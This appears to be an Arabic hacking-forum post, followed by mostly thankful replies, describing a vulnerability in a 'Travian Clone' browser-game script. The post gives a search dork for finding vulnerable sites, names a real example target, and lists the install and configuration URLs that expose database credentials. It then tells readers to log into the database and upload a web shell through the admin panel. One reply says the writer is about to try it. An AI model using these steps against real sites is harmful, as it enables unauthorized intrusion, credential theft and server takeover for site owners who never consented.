عوده بقوه ~ ثغرة بسكربت ترافيان المطور

بسم الله الرحمن الرحيمـ
السلام عليكم ورحمة الله وبركاته

..
..
..

بعد ركود طويل عن الهكر قلت لا ترجع الا بيدك شي حلو
وبعد البحث والتدقيق لقيت ثغرة بسكربت
( ترافيان v2 المطور ) << اخر نسخه مو عاقل الولد خخخ
..
..
..

يلا نبدء على بكرة الله

الدورك :

كود:
"© 2004 - 2010 Travian Clone Games Rev 3.0"طبعا المواقع المصابه بالهبل سواء ( مواقع اجنبيه و عربيه )
اتمنى عدم استهداف العرب

ناخذ مثال على موقع اجنبي

www.lagronsinc.com/kingdoms

السكربت في مجلد kingdoms

الأن الاستغلال


كود:
install_v2/?s=4الاستغلال كامل

www.lagronsinc.com/kingdoms/install_v2/?s=4

اذا ظهرت لك الصفحه تمام واذا ما ظهرت معناه مرقعه

الأن روح المسار التالي


كود:
/install_v2/include/constant.phpsيصير الرابط في الاخير كذا

http://www.lagronsinc.com/kingdoms/i.../constant.phps

وش تشوف ؟!


//SQL Server Defination
define("SQL_SERVER", "localhost");
define("SQL_USER", "user_xxxxxxx");
define("SQL_PASS", "xxxxxxxx");
define("SQL_DB", "db_xxxxxxxx");
define("TB_PREFIX", "s1_");
define("DB_TYPE", 0); // 0 = MYSQL, 1 = MYSQLi



كل الي عليك انك تستعمل اي برنامج اتصال بالقاعده
مثل برنامج : navicat
وترفع شل من اللوحه
Admin/Admin.php

بارك الله فيك

مشكور اخوي إ^,^إ بس انت استخرجت الثغره من دالهc$ ؟

مشكوووووووور

مشكورررررررررررررررررررررر

ثغره قويه بصراحه

الله يحفظك ويخليك

طبعاً انا مستغرب كيف متحمسين العالم على هذي اللعبه ههههههههههاي

واهو اثاري فيه ثغرات لها يعني بسهوله تامه الواحد لو بغا يهكرها هكرها

الله يعطيك العافيه اخوي وطبعاً ما نفكر نهكرها نحنا قد تسلينا فيها ونخليها للي بعدنا عشان يتسلو فيها

وترافيان لعبه ما تستاهل احد يهكرها <<< كيف فوق كاتب شي وهنا شي ههههههههاي

المهم تحياتي ياعسل

شكرآآآآآآآآآآآآآآآآآآآآآآ

حلوووووووووو

جاري التجربه

merciiiii

انشاءالله سهل

مشكور اخوي

يعطيك الف عافيه